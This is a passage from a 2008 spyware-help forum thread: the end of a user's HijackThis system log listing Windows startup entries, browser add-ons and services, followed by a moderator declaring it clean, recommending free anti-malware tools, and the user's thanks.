R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft....k/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MI1933~1\Office12\GRA8E1~1.DLL
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [Broadcom Wireless Manager UI] C:\WINDOWS\system32\WLTRAY.exe
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [VMSnap3] C:\WINDOWS\VMSnap3.EXE
O4 - HKLM\..\Run: [Domino] C:\WINDOWS\Domino.EXE
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Yahoo! Widget Engine.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
O4 - Global Startup: Bluetooth.lnk = ?
O8 - Extra context menu item: Download Using &BitSpirit - C:\Program Files\BitSpirit\bsurl.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra button: Bonjour - {7F9DB11C-E358-4ca6-A83D-ACC663939424} - C:\Program Files\Bonjour\ExplorerPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\Office12\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {20A60F0D-9AFA-4515-A0FD-83BD84642501} (Checkers Class) - http://messenger.zon...kr.cab56986.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://download.mcaf...01/mcinsctl.cab
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zon...1/GAME_UNO1.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zon...ro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zon...nt.cab56907.cab
O16 - DPF: {DA758BB1-5F89-4465-975F-8D7179A4BCF3} (WheelofFortune Object) - http://messenger.zon...oF.cab57176.cab
O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) - http://messenger.zon...er.cab56986.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{BF5CCFB5-6096-404D-B329-56E8F3847FA6}: NameServer = 62.117.40.111,62.117.40.112
O17 - HKLM\System\CCS\Services\Tcpip\..\{CA254E2C-5690-497E-9971-569C6268C2DB}: NameServer = 62.117.40.111,80.75.166.250
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MI1933~1\Office12\GR99D3~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AOL Connectivity Service (AOL ACS) - America Online, Inc. - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: GoogleDesktopManager - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktopManager.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: mental ray 3.5 Satellite (32-bit) (mi-raysat_3dsmax9_32) - Unknown owner - C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
O23 - Service: MySQL - Unknown owner - C:\Program.exe (file missing)
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall Pro (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\SPF\smc.exe
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: TuneUp Drive Defrag Service (TuneUp.Defrag) - TuneUp Software GmbH - C:\WINDOWS\System32\TuneUpDefragService.exe
O23 - Service: Dell Wireless WLAN Tray Service (wltrysvc) - Unknown owner - C:\WINDOWS\System32\WLTRYSVC.EXE

--
End of file - 10457 bytes

#19 TheJoker

TheJoker

    Forum Deity

  • Boot Camp Mod
  • PipPipPipPipPip
  • 14,352 posts

Posted 20 June 2008 - 05:17 PM

Everything looks good. :D

There are several free utilities you can use to help keep malware off your system:

A HOSTS file will prevent Internet Explorer from communicating with sites known to be associated with adware or spyware. A good regularly updated HOST file is MVPS HOSTS File, available at http://www.mvps.org/...p2002/hosts.htm.

IE/SPYAD adds sites associated with ads and spyware to your Internet Restricted Zone and you can download that at http://www.spywarewa...uc/resource.htm.

A free non-resident utility to prevent the installation of ActiveX-based malware is JavaCool's SpywareBlaster. For real-time protection, there is SpywareGuard. Both are available at http://www.javacools...m/products.html.

I recommend reading Tony Klein's article So How did I get Infected in the First Place? at http://forums.spywar...showtopic=60955

Does your problem appear resolved?

Free Tools for Fighting Malware
Anti-Virus: avast! Free Antivirus / Avira Free AntiVirus
OnLine Anti-Virus: ESET / BitDefender / F-Secure
Anti-Malware: Malwarebytes' Anti-Malware / Dr.Web CureIt
Spyware/Adware Tools: MVPS HOSTS File / SpywareBlaster
Firewall: Comodo Firewall Free / Privatefirewall
Tutorials: How did I get Infected? / Internet Explorer Privacy & Security Settings
If we have helped, please help us continue the fight by using the Donate button, or see this topic for other ways to donate.

MS MVP 2009-20010 and ASAP Member since 2005


#20 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 20 June 2008 - 07:08 PM

Yes, thanks a lot Joker :). You guys are doing great work here on spywareinfo. You helped me like 5 times now, much appreciated :D

I will check these software you mentioned , thanks for the list.

By the way, you should spread the word about how to uninstall anywebcam, since it seems a well known unsolvable problem for many


Thanks again ^_^

#21 TheJoker

TheJoker

    Forum Deity

  • Boot Camp Mod
  • PipPipPipPipPip
  • 14,352 posts

Posted 21 June 2008 - 09:44 AM

Glad we could help. :)

If you need this topic reopened, please tell the moderating team by replying here with the address of the thread. This applies only to the original topic starter. Everyone else please begin a New Topic.

Free Tools for Fighting Malware
Anti-Virus: avast! Free Antivirus / Avira Free AntiVirus
OnLine Anti-Virus: ESET / BitDefender / F-Secure
Anti-Malware: Malwarebytes' Anti-Malware / Dr.Web CureIt
Spyware/Adware Tools: MVPS HOSTS File / SpywareBlaster
Firewall: Comodo Firewall Free / Privatefirewall
Tutorials: How did I get Infected? / Internet Explorer Privacy & Security Settings
If we have helped, please help us continue the fight by using the Donate button, or see this topic for other ways to donate.

MS MVP 2009-20010 and ASAP Member since 2005





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Member of ASAP and UNITE
Support SpywareInfo Forum - click the button